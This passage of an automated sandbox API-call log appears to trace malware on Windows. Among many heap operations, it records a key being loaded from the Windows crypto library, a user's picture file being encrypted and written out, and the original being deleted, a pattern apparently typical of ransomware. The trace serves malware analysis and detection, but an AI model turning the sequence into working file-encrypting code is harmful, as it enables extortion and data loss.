hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0093.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0093.739] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0093.739] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2830, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2830*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0093.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0093.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.741] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.742] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0093.742] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0093.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0093.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0093.743] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0093.744] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x4807, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x4810) returned 1 [0093.744] CharLowerBuffW (in: lpsz="byte[18449]", cchLength=0xb | out: lpsz="byte[18449]") returned 0xb [0093.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.744] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0093.744] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4523840*, pdwDataLen=0x144e538*=0x4807, dwBufLen=0x4810 | out: pbData=0x4523840*, pdwDataLen=0x144e538*=0x4810) returned 1 [0093.744] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.745] WriteFile (in: hFile=0x258, lpBuffer=0x453a0c8*, nNumberOfBytesToWrite=0x4810, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x453a0c8*, lpNumberOfBytesWritten=0x144ef3c*=0x4810, lpOverlapped=0x0) returned 1 [0093.746] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0093.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca9d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0093.747] CryptDestroyKey (hKey=0x41ac640) returned 1 [0093.747] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.747] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.785] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.786] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0093.786] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0093.786] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.786] FreeLibrary (hLibModule=0x756e0000) returned 1 [0093.786] CloseHandle (hObject=0x298) returned 1 [0093.786] CloseHandle (hObject=0x258) returned 1 [0093.788] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png", lpFilePart=0x0) returned 0x28 [0093.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0093.788] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ewwh.png")) returned 0x20 [0093.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0093.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0093.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0093.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0093.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0093.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0093.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0093.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0093.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0093.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0093.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0093.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0093.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0093.789] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfea366e0, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xfb8a48f0, ftLastAccessTime.dwHighDateTime=0x1d5e11e, ftLastWriteTime.dwLowDateTime=0xfb8a48f0, ftLastWriteTime.dwHighDateTime=0x1d5e11e, nFileSizeHigh=0x0, nFileSizeLow=0x4807, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="EWWH.png", cAlternateFileName="")) returned 0x41ac6c0 [0093.789] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\EWWH.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\ewwh.png")) returned 1 [0093.898] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfea366e0, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xfb8a48f0, ftLastAccessTime.dwHighDateTime=0x1d5e11e, ftLastWriteTime.dwLowDateTime=0xfb8a48f0, ftLastWriteTime.dwHighDateTime=0x1d5e11e, nFileSizeHigh=0x0, nFileSizeLow=0x4807, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="EWWH.png", cAlternateFileName="")) returned 0 [0093.898] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0093.899] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 